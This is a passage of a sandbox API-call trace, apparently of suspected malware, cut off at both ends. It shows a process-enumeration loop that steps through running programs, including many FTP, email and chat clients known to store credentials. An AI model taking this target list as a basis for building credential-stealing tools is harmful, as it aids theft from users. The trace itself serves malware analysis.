hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.437] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="chi.exe")) returned 1 [0168.438] GetTickCount () returned 0x11596c4 [0168.438] GetCurrentThreadId () returned 0x324 [0168.438] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.438] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.438] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="amp.exe")) returned 1 [0168.439] GetTickCount () returned 0x11596c4 [0168.439] GetCurrentThreadId () returned 0x324 [0168.439] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.439] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.439] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sherman-nomination.exe")) returned 1 [0168.440] GetTickCount () returned 0x11596c4 [0168.440] GetCurrentThreadId () returned 0x324 [0168.440] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.441] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.441] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="checking_integration_majority.exe")) returned 1 [0168.441] GetTickCount () returned 0x11596c4 [0168.441] GetCurrentThreadId () returned 0x324 [0168.442] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.442] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.442] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="frcarefultypical.exe")) returned 1 [0168.442] GetTickCount () returned 0x11596c4 [0168.442] GetCurrentThreadId () returned 0x324 [0168.443] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.443] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.443] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ec_lessons.exe")) returned 1 [0168.443] GetTickCount () returned 0x11596c4 [0168.443] GetCurrentThreadId () returned 0x324 [0168.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.444] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.444] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="homeland-used.exe")) returned 1 [0168.444] GetTickCount () returned 0x11596c4 [0168.444] GetCurrentThreadId () returned 0x324 [0168.444] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.445] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="shipped_hormone.exe")) returned 1 [0168.445] GetTickCount () returned 0x11596c4 [0168.445] GetCurrentThreadId () returned 0x324 [0168.445] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.445] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.446] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cambridge knowing.exe")) returned 1 [0168.446] GetTickCount () returned 0x11596c4 [0168.446] GetCurrentThreadId () returned 0x324 [0168.446] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.447] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.447] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="maritime institutional.exe")) returned 1 [0168.447] GetTickCount () returned 0x11596c4 [0168.448] GetCurrentThreadId () returned 0x324 [0168.448] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.448] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.448] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="conditioning-surf-detection.exe")) returned 1 [0168.448] GetTickCount () returned 0x11596c4 [0168.448] GetCurrentThreadId () returned 0x324 [0168.449] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.449] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.449] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="muscles.exe")) returned 1 [0168.449] GetTickCount () returned 0x11596c4 [0168.449] GetCurrentThreadId () returned 0x324 [0168.450] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.450] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.450] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mark drugs.exe")) returned 1 [0168.450] GetTickCount () returned 0x11596c4 [0168.451] GetCurrentThreadId () returned 0x324 [0168.451] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.451] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.451] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="anybody.exe")) returned 1 [0168.452] GetTickCount () returned 0x11596c4 [0168.452] GetCurrentThreadId () returned 0x324 [0168.452] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.452] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.452] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="borders-connected.exe")) returned 1 [0168.453] GetTickCount () returned 0x11596d4 [0168.453] GetCurrentThreadId () returned 0x324 [0168.453] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.453] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.453] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0168.454] GetTickCount () returned 0x11596d4 [0168.454] GetCurrentThreadId () returned 0x324 [0168.454] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.454] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.454] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0168.455] GetTickCount () returned 0x11596d4 [0168.455] GetCurrentThreadId () returned 0x324 [0168.455] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.455] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.455] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0168.456] GetTickCount () returned 0x11596d4 [0168.456] GetCurrentThreadId () returned 0x324 [0168.456] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.456] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.456] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0168.457] GetTickCount () returned 0x11596d4 [0168.457] GetCurrentThreadId () returned 0x324 [0168.457] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.457] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.457] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0168.458] GetTickCount () returned 0x11596d4 [0168.458] GetCurrentThreadId () returned 0x324 [0168.458] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.458] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.458] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0168.459] GetTickCount () returned 0x11596d4 [0168.459] GetCurrentThreadId () returned 0x324 [0168.459] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.459] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.459] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0168.461] GetTickCount () returned 0x11596d4 [0168.461] GetCurrentThreadId () returned 0x324 [0168.461] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.461] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.461] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0168.462] GetTickCount () returned 0x11596d4 [0168.462] GetCurrentThreadId () returned 0x324 [0168.462] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.462] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.462] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0168.464] GetTickCount () returned 0x11596d4 [0168.464] GetCurrentThreadId () returned 0x324 [0168.464] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.464] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.464] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0168.466] GetTickCount () returned 0x11596d4 [0168.466] GetCurrentThreadId () returned 0x324 [0168.466] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.466] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.466] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0168.467] GetTickCount () returned 0x11596d4 [0168.467] GetCurrentThreadId () returned 0x324 [0168.467] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.468] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.468] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0168.469] GetTickCount () returned 0x11596e3 [0168.469] GetCurrentThreadId () returned 0x324 [0168.469] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.469] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.469] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0168.471] GetTickCount () returned 0x11596e3 [0168.471] GetCurrentThreadId () returned 0x324 [0168.471] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.471] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.471] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0168.472] GetTickCount () returned 0x11596e3 [0168.472] GetCurrentThreadId () returned 0x324 [0168.472] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.472] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.472] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0168.474] GetTickCount () returned 0x11596e3 [0168.474] GetCurrentThreadId () returned 0x324 [0168.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.474] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.474] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0168.475] GetTickCount () returned 0x11596e3 [0168.475] GetCurrentThreadId () returned 0x324 [0168.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.475] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.475] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0168.476] GetTickCount () returned 0x11596e3 [0168.477] GetCurrentThreadId () returned 0x324 [0168.477] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.477] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.477] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0168.478] GetTickCount () returned 0x11596e3 [0168.478] GetCurrentThreadId () returned 0x324 [0168.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.478] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0168.479] GetTickCount () returned 0x11596e3 [0168.479] GetCurrentThreadId () returned 0x324 [0168.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.479] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0168.480] GetTickCount () returned 0x11596e3 [0168.480] GetCurrentThreadId () returned 0x324 [0168.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.480] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0168.481] GetTickCount () returned 0x11596e3 [0168.481] GetCurrentThreadId () returned 0x324 [0168.481] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.481] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.481] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0168.482] GetTickCount () returned 0x11596e3 [0168.482] GetCurrentThreadId () returned 0x324 [0168.482] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.482] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.482] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0168.484] GetTickCount () returned 0x11596f3 [0168.484] GetCurrentThreadId () returned 0x324 [0168.484] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.484] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.484] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0168.485] GetTickCount () returned 0x11596f3 [0168.485] GetCurrentThreadId () returned 0x324 [0168.485] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.485] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.485] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0168.486] GetTickCount () returned 0x11596f3 [0168.486] GetCurrentThreadId () returned 0x324 [0168.486] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.486] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.486] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0168.487] GetTickCount () returned 0x11596f3 [0168.487] GetCurrentThreadId () returned 0x324 [0168.487] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.487] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.487] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0168.488] GetTickCount () returned 0x11596f3 [0168.488] GetCurrentThreadId () returned 0x324 [0168.488] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.488] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.488] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: lppe=0x401f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0168.489] GetTickCount () returned 0x11596f3 [0168.489] GetCurrentThreadId () returned 0x324 [0168.489] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0168.489] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0168.489] Process32Next (in: hSnapshot=0x674, lppe=0x401f258 | out: 